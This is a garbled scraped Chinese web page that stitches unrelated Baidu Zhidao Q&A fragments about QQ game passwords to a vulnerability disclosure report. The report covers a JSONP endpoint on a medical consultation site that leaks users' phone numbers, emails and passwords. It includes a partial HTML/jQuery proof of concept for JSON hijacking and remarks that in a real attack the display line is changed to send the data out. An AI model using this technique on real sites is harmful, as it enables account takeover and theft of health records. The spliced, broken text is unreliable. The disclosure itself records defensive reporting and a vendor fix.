多了保皇为什么获取不了验证密保找回密码码

来源:蜘蛛抓取(WebSpider) 时间:2016-05-03 04:07 标签: h1z1邮箱验证密码错误
敢做敢当当网支付密码为什么获取不了验证码 详情请看下图。_百度知道
敢做敢当当网支付密码为什么获取不了验证码 详情请看下图。
//c://c.hiphotos://c.com/zhidao/wh%3D450%2C600/sign=/zhidao/wh%3D600%2C800/sign=bda1cd922e4c4/37d12f2ebdde7116e4c;
其他类似问题
为您推荐:
其他1条回答
你解决了这个问题了吗?我也遇到这种情况,怎么解决
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁请问我的QQ游戏保皇出现了这个问题怎么办_百度知道
请问我的QQ游戏保皇出现了这个问题怎么办
就是把个人形象的那一栏隐藏掉了,怎样把他弄出来
提问者采纳
是不是QQ保皇表情包文件损坏了吧,就只有卸载QQ游戏重新下载,安装就解决了。
其他类似问题
为您推荐:
qq游戏的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁QQ保皇密码怎么设置?_百度知道
QQ保皇密码怎么设置?
提问者采纳
其他类似问题
为您推荐:
qq保皇的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 厂商已经修复漏洞并主动公开,细节向公众公开
简要描述:
我也不知道为什么密码会出现在json里!
详细说明:
抓包时,过滤搜索到了这个接口
code 区域http://api./n_userHeaderGet.php?callback=1&a=u&uid=
手机号、邮箱、密码、注册日期...全部在里面(PS:我没绑定邮箱)
不过这个接口有一个麻烦点,其中有一个uid参数,尝试去掉uid访问,结果为空。也就是说,查询了当前的uid并且验证了cookie,无法越权。
但是这并不影响,此问题可以达到指哪打哪的效果,只是需要交互,然而这并不难。
你可以任意挑选一个人审查元素得到他的uid构造链接。
POC:(PS:测试POC需要将uid改成自己或需要攻击的人)
真实场景下,将输出语句改成发送语句即可~~
code 区域&!DOCTYPE html&
&script src=&/jquery-1.9.1.min.js&&&/script&
&meta charset=&GBK&&
&title&POC&/title&
&p&result:&/p&
$.getJSON('http://api.//n_userHeaderGet.php?a=u&uid=&callback=?',function(json){
document.body.appendChild(document.createElement('p')).innerHTML=json.username+&&br/&&+json.insert_data+&&br/&&+json.userphone+&&br/&&+json.
漏洞证明:
获取的密码可以成功登陆他人账号,导致用户敏感信息,健康档案、曾咨询的病情等。
危害较大,求不小厂商。
修复方案:
瘦子快给我发礼物!
版权声明:转载请注明来源 @
厂商回应:
危害等级:高
漏洞Rank:14
确认时间: 09:16
厂商回复:
感谢jeary小骚年近日来对寻医问药网的支持,定向csrf攻击成本个人认为还是很高的,但因为涉及到重要数据,所以给高危。
最新状态:
:漏洞已修复。
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
@Me_Fortune json劫持吧?@寻医问药
登录后才能发表评论,请先

我要回帖

更多关于 h1z1邮箱验证密码错误 的文章

 

随机推荐